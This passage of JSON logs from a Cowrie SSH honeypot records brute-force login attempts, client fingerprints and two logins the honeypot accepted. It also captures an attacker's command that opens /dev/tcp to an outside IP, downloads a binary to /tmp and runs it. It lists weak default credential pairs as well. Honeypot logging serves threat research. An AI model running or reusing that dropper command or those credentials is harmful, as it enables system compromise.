-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:01:59.643775Z","src_ip":"170.64.157.139","session":"4107ddf9c7de"}
{"eventid":"cowrie.login.failed","username":"server","password":"server","message":"login attempt [server/server] failed","sensor":"my-vps","timestamp":"2025-09-08T18:02:00.660208Z","src_ip":"170.64.157.139","session":"4107ddf9c7de"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:02:01.991373Z","src_ip":"170.64.157.139","session":"4107ddf9c7de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59610,"dst_ip":"1.2.3.4","dst_port":22,"session":"adf56dc886f2","protocol":"ssh","message":"New connection: 212.227.235.229:59610 (1.2.3.4:22) [session: adf56dc886f2]","sensor":"my-vps","timestamp":"2025-09-08T18:02:40.916666Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:02:40.918165Z","src_ip":"212.227.235.229","session":"adf56dc886f2"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-08T18:02:41.007158Z","src_ip":"212.227.235.229","session":"adf56dc886f2"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"a0:ab:88:f5:cc:94:ab:d8:54:36:30:6e:1f:2b:99:b0","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDX2CMGFTTqy0yMWeQC+ETPu0gngZVOFblo3Xxf9u+bywraF5pOMpHGqa3r2Wu/conbX0lzP/mxMii5JCqtZhAfZB0PHZInl9v8lPrxAb/edp1zLdPznEsqx9Geb+z/p28H74yybBQ/kEbthLstspFKdxaDZZFhyVydMEPTt7eAlGz4KvtmDURkoeY0zRIgWJQG+CXTcUADdVdIZC6dQ5o9nMzVZbBXSghk5fPmLHZsfbV8V1RPTA3GCTgHR5rF+U2ERYWQOK3VXbwM1Wu6lIrikmTOPTL1xlwrU0gHnnXqtFtNQPRuNAS0zLRzjzNRHeh7oXcxuf5zLphickrvubUw+el7JhVRJ3O2ppl41qiMZaboI2iUQoipJhLSSrUfSypxAxLcxltZherYKQNyxrPmjmMe9rB/dAu2UsE7VF2svsMfx+uvK1hgif/zOYmiB0XUKwbW1KxQrMhrN/Zlq8tmjk0ucQBswhTuLWu1ucwAw4ASD8PiZfIp4771XHWjlls=","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint a0:ab:88:f5:cc:94:ab:d8:54:36:30:6e:1f:2b:99:b0","sensor":"my-vps","timestamp":"2025-09-08T18:02:41.186222Z","src_ip":"212.227.235.229","session":"adf56dc886f2"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"a0:ab:88:f5:cc:94:ab:d8:54:36:30:6e:1f:2b:99:b0","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDX2CMGFTTqy0yMWeQC+ETPu0gngZVOFblo3Xxf9u+bywraF5pOMpHGqa3r2Wu/conbX0lzP/mxMii5JCqtZhAfZB0PHZInl9v8lPrxAb/edp1zLdPznEsqx9Geb+z/p28H74yybBQ/kEbthLstspFKdxaDZZFhyVydMEPTt7eAlGz4KvtmDURkoeY0zRIgWJQG+CXTcUADdVdIZC6dQ5o9nMzVZbBXSghk5fPmLHZsfbV8V1RPTA3GCTgHR5rF+U2ERYWQOK3VXbwM1Wu6lIrikmTOPTL1xlwrU0gHnnXqtFtNQPRuNAS0zLRzjzNRHeh7oXcxuf5zLphickrvubUw+el7JhVRJ3O2ppl41qiMZaboI2iUQoipJhLSSrUfSypxAxLcxltZherYKQNyxrPmjmMe9rB/dAu2UsE7VF2svsMfx+uvK1hgif/zOYmiB0XUKwbW1KxQrMhrN/Zlq8tmjk0ucQBswhTuLWu1ucwAw4ASD8PiZfIp4771XHWjlls=","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-08T18:02:41.186842Z","src_ip":"212.227.235.229","session":"adf56dc886f2"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"a0:ab:88:f5:cc:94:ab:d8:54:36:30:6e:1f:2b:99:b0","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDX2CMGFTTqy0yMWeQC+ETPu0gngZVOFblo3Xxf9u+bywraF5pOMpHGqa3r2Wu/conbX0lzP/mxMii5JCqtZhAfZB0PHZInl9v8lPrxAb/edp1zLdPznEsqx9Geb+z/p28H74yybBQ/kEbthLstspFKdxaDZZFhyVydMEPTt7eAlGz4KvtmDURkoeY0zRIgWJQG+CXTcUADdVdIZC6dQ5o9nMzVZbBXSghk5fPmLHZsfbV8V1RPTA3GCTgHR5rF+U2ERYWQOK3VXbwM1Wu6lIrikmTOPTL1xlwrU0gHnnXqtFtNQPRuNAS0zLRzjzNRHeh7oXcxuf5zLphickrvubUw+el7JhVRJ3O2ppl41qiMZaboI2iUQoipJhLSSrUfSypxAxLcxltZherYKQNyxrPmjmMe9rB/dAu2UsE7VF2svsMfx+uvK1hgif/zOYmiB0XUKwbW1KxQrMhrN/Zlq8tmjk0ucQBswhTuLWu1ucwAw4ASD8PiZfIp4771XHWjlls=","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint a0:ab:88:f5:cc:94:ab:d8:54:36:30:6e:1f:2b:99:b0","sensor":"my-vps","timestamp":"2025-09-08T18:02:41.276409Z","src_ip":"212.227.235.229","session":"adf56dc886f2"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"a0:ab:88:f5:cc:94:ab:d8:54:36:30:6e:1f:2b:99:b0","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDX2CMGFTTqy0yMWeQC+ETPu0gngZVOFblo3Xxf9u+bywraF5pOMpHGqa3r2Wu/conbX0lzP/mxMii5JCqtZhAfZB0PHZInl9v8lPrxAb/edp1zLdPznEsqx9Geb+z/p28H74yybBQ/kEbthLstspFKdxaDZZFhyVydMEPTt7eAlGz4KvtmDURkoeY0zRIgWJQG+CXTcUADdVdIZC6dQ5o9nMzVZbBXSghk5fPmLHZsfbV8V1RPTA3GCTgHR5rF+U2ERYWQOK3VXbwM1Wu6lIrikmTOPTL1xlwrU0gHnnXqtFtNQPRuNAS0zLRzjzNRHeh7oXcxuf5zLphickrvubUw+el7JhVRJ3O2ppl41qiMZaboI2iUQoipJhLSSrUfSypxAxLcxltZherYKQNyxrPmjmMe9rB/dAu2UsE7VF2svsMfx+uvK1hgif/zOYmiB0XUKwbW1KxQrMhrN/Zlq8tmjk0ucQBswhTuLWu1ucwAw4ASD8PiZfIp4771XHWjlls=","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-08T18:02:41.277734Z","src_ip":"212.227.235.229","session":"adf56dc886f2"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:02:50.916687Z","src_ip":"212.227.235.229","session":"adf56dc886f2"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57922,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7fbacd8e756","protocol":"ssh","message":"New connection: 217.72.205.35:57922 (1.2.3.4:22) [session: d7fbacd8e756]","sensor":"my-vps","timestamp":"2025-09-08T18:03:16.403119Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:03:16.404115Z","src_ip":"217.72.205.35","session":"d7fbacd8e756"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":39080,"dst_ip":"1.2.3.4","dst_port":22,"session":"5513087db87a","protocol":"ssh","message":"New connection: 170.64.157.139:39080 (1.2.3.4:22) [session: 5513087db87a]","sensor":"my-vps","timestamp":"2025-09-08T18:03:20.757520Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:03:20.758478Z","src_ip":"170.64.157.139","session":"5513087db87a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:03:21.011716Z","src_ip":"170.64.157.139","session":"5513087db87a"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop","message":"login attempt [hadoop/hadoop] failed","sensor":"my-vps","timestamp":"2025-09-08T18:03:21.784533Z","src_ip":"170.64.157.139","session":"5513087db87a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:03:23.040069Z","src_ip":"170.64.157.139","session":"5513087db87a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":25781,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d43bc05bba0","protocol":"ssh","message":"New connection: 212.227.125.160:25781 (1.2.3.4:22) [session: 0d43bc05bba0]","sensor":"my-vps","timestamp":"2025-09-08T18:03:31.272328Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:03:31.273385Z","src_ip":"212.227.125.160","session":"0d43bc05bba0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":26034,"dst_ip":"1.2.3.4","dst_port":22,"session":"2613c8b888cf","protocol":"ssh","message":"New connection: 212.227.125.160:26034 (1.2.3.4:22) [session: 2613c8b888cf]","sensor":"my-vps","timestamp":"2025-09-08T18:03:31.385389Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:03:31.386235Z","src_ip":"212.227.125.160","session":"2613c8b888cf"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T18:03:31.498626Z","src_ip":"212.227.125.160","session":"2613c8b888cf"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:03:31.836842Z","src_ip":"212.227.125.160","session":"2613c8b888cf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T18:03:31.952001Z","session":"2613c8b888cf"}
{"eventid":"cowrie.session.connect","src_ip":"8.138.136.155","src_port":45446,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6bbcca2d648","protocol":"ssh","message":"New connection: 8.138.136.155:45446 (1.2.3.4:22) [session: c6bbcca2d648]","sensor":"my-vps","timestamp":"2025-09-08T18:03:48.081647Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-makiko","message":"Remote SSH version: SSH-2.0-makiko","sensor":"my-vps","timestamp":"2025-09-08T18:03:48.082503Z","src_ip":"8.138.136.155","session":"c6bbcca2d648"}
{"eventid":"cowrie.client.kex","hassh":"2f5ebb184f5d02324eed9a822f5259dc","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1-etm@openssh.com,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","rsa-sha2-256","rsa-sha2-512","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1-etm@openssh.com","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2f5ebb184f5d02324eed9a822f5259dc","sensor":"my-vps","timestamp":"2025-09-08T18:03:48.082954Z","src_ip":"8.138.136.155","session":"c6bbcca2d648"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T18:03:48.788464Z","src_ip":"8.138.136.155","session":"c6bbcca2d648"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:03:50.009446Z","src_ip":"8.138.136.155","session":"c6bbcca2d648"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:03:50.507931Z","src_ip":"8.138.136.155","session":"c6bbcca2d648"}
{"eventid":"cowrie.command.input","input":"cat /bin/echo","message":"CMD: cat /bin/echo","sensor":"my-vps","timestamp":"2025-09-08T18:03:50.509971Z","src_ip":"8.138.136.155","session":"c6bbcca2d648"}
{"eventid":"cowrie.command.input","input":"nohup bash -c \"exec 6<>/dev/tcp/129.144.180.26/60107 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/ezbA8mGjQ4 && chmod +x /tmp/ezbA8mGjQ4 && /tmp/ezbA8mGjQ4 NscVQdJs9YYGXI8uh1sOnvJs1FcN1kVOyRxb1HPzkARHjTaFXwSZ8mrAXhvfWUbWFEHRavGGAFGFNo9YAJriZc5eHt9ZRtQbQdFo95ICWY4xjmFvwso79ZAHbjAznoxZWq9SqNul74gWX0g=\" &","message":"CMD: nohup bash -c \"exec 6<>/dev/tcp/129.144.180.26/60107 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/ezbA8mGjQ4 && chmod +x /tmp/ezbA8mGjQ4 && /tmp/ezbA8mGjQ4 NscVQdJs9YYGXI8uh1sOnvJs1FcN1kVOyRxb1HPzkARHjTaFXwSZ8mrAXhvfWUbWFEHRavGGAFGFNo9YAJriZc5eHt9ZRtQbQdFo95ICWY4xjmFvwso79ZAHbjAznoxZWq9SqNul74gWX0g=\" &","sensor":"my-vps","timestamp":"2025-09-08T18:03:56.740868Z","src_ip":"8.138.136.155","session":"c6bbcca2d648"}
{"eventid":"cowrie.command.input","input":"head -c 1458464 > /tmp/WUMQzjwpGA","message":"CMD: head -c 1458464 > /tmp/WUMQzjwpGA","sensor":"my-vps","timestamp":"2025-09-08T18:03:56.744401Z","src_ip":"8.138.136.155","session":"c6bbcca2d648"}
{"eventid":"cowrie.command.input","input":"cat /bin/echoQtd#UPX!","message":"CMD: cat /bin/echoQtd#UPX!","sensor":"my-vps","timestamp":"2025-09-08T18:03:56.983641Z","src_ip":"8.138.136.155","session":"c6bbcca2d648"}
{"eventid":"cowrie.command.input","input":">yoA@/;'8ELFP;i2","message":"CMD: >yoA@/;'8ELFP;i2","sensor":"my-vps","timestamp":"2025-09-08T18:03:56.989947Z","src_ip":"8.138.136.155","session":"c6bbcca2d648"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-09-08T18:03:56.994574Z","src_ip":"8.138.136.155","session":"c6bbcca2d648"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/9f78efab1f32d4affdf3eb00ccfab9bb47bec719380f94f0ad4e339d1aa49620","size":1972,"shasum":"9f78efab1f32d4affdf3eb00ccfab9bb47bec719380f94f0ad4e339d1aa49620","duplicate":false,"duration":"6.5","message":"Closing TTY Log: var/lib/cowrie/tty/9f78efab1f32d4affdf3eb00ccfab9bb47bec719380f94f0ad4e339d1aa49620 after 6.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:03:56.996390Z","src_ip":"8.138.136.155","session":"c6bbcca2d648"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:03:56.998080Z","src_ip":"8.138.136.155","session":"c6bbcca2d648"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:04:41.385051Z","src_ip":"212.227.125.160","session":"2613c8b888cf"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":53766,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf657b939869","protocol":"ssh","message":"New connection: 170.64.157.139:53766 (1.2.3.4:22) [session: bf657b939869]","sensor":"my-vps","timestamp":"2025-09-08T18:04:42.386522Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:04:42.387362Z","src_ip":"170.64.157.139","session":"bf657b939869"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:04:42.690774Z","src_ip":"170.64.157.139","session":"bf657b939869"}
{"eventid":"cowrie.login.failed","username":"git","password":"git","message":"login attempt [git/git] failed","sensor":"my-vps","timestamp":"2025-09-08T18:04:43.615476Z","src_ip":"170.64.157.139","session":"bf657b939869"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:04:44.920830Z","src_ip":"170.64.157.139","session":"bf657b939869"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":46118,"dst_ip":"1.2.3.4","dst_port":22,"session":"56e79fb0dffe","protocol":"ssh","message":"New connection: 170.64.157.139:46118 (1.2.3.4:22) [session: 56e79fb0dffe]","sensor":"my-vps","timestamp":"2025-09-08T18:05:57.196005Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:05:57.230304Z","src_ip":"170.64.157.139","session":"56e79fb0dffe"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:05:57.485607Z","src_ip":"170.64.157.139","session":"56e79fb0dffe"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy","message":"login attempt [deploy/deploy] failed","sensor":"my-vps","timestamp":"2025-09-08T18:05:58.505691Z","src_ip":"170.64.157.139","session":"56e79fb0dffe"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:05:59.769027Z","src_ip":"170.64.157.139","session":"56e79fb0dffe"}
